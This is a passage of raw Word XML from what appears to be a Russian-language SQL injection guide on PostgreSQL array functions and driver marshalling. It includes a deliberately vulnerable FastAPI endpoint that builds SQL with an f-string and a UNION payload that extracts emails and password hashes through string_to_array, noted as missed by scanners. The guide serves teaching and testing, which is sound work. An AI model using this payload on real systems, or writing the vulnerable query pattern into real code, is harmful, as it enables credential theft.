          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, и т.д. Операторы для работы с array-target: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 = ANY(array)`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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> равно хотя бы одному элементу </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Эквивалент </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">x IN (...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но с array-аргументом.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 = ALL(array)`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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> равно всем элементам.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`array @&gt; array`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — left-array содержит right-array (containment).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`array &lt;@ array`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — left-array содержится в right-array (contained).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`array &amp;&amp; array`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — пересечение (overlap).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Driver-уровневое маршалирование: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psycopg2 / psycopg3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ARRAY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. По умолчанию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">[1, 2, 3]</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ARRAY[1, 2, 3]::int[]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asyncpg</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ARRAY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Идентично psycopg, но с разной семантикой type inference.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pgjdbc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Array.of(...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ARRAY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">; для bind variable используется </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">setArray()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (типизированно) или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">setObject(..., Types.ARRAY)</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node-postgres</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — JS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → PG </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ARRAY</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pg.types</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-codec.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pgx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Go) — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgtype.Int4Array</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через codec.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Injection-классы в 3.11.4:</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`string_to_array` injection через separator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string_to_array('$user_input', ',')</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> интерпретирует первый параметр как text, разделитель — литерал. Атакующий контролирует </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">содержимое строки</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> до </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">string_to_array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> cast в array.</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Type-confusion при scalar vs array bind</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — драйверы делают разные предположения о типе bind value. Атакующий может передать форму, которая на одном драйвере scalar, на другом array.</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Containment-операторы (`@&gt;`, `&lt;@`, `&amp;&amp;`)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с user-controlled array — bypass проверок типа «id входит в whitelist».</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`unnest`-обратная операция</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SELECT unnest(string_to_array('$x', ','))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> разворачивает array в строки, что меняет семантику UNION-payload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload A — separator injection в string_to_array</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: эндпоинт принимает comma-separated список ID для batch-операции.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">@router.get("/users/batch")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">async def get_batch(ids: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 = text(f"SELECT * FROM users WHERE id = ANY(string_to_array('{ids}', ',')::int[])")</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Application ожидает: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ids = "1,2,3"</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WHERE id IN (1, 2, 3)</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ids</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1,2,3'::int[]) UNION SELECT id, email, password_hash FROM users--</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 FROM users WHERE id = ANY(string_to_array('1,2,3'::int[]) UNION SELECT id, email, password_hash FROM users--', ',')::int[])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После interpolation одинарная кавычка после </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> разрывает строковый литерал в string_to_array.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закрывает преждевременно. Дальше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION SELECT id, email, password_hash FROM users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — классический UNION-canal.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затирает остаток.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Корректное представление с разорванной структурой:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE id = ANY(string_to_array('1,2,3', ',')::int[])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">UNION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT id, email, password_hash</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">--', ',')::int[])</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это классическая SQLi (3.1 UNION) через type-cast point. Особенность: входная точка — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">string_to_array</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-аргумент, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">необычно</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> для классических injection-сканеров (они ищут </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE col = '...'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, не </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE col = ANY(string_to_array('...'))</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B — type-confusion: scalar в array-контексте</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Контекст: код ожидает array, но не валидирует тип параметра. psycopg2 принимает любой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">list</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-like объект; если приложение передаёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
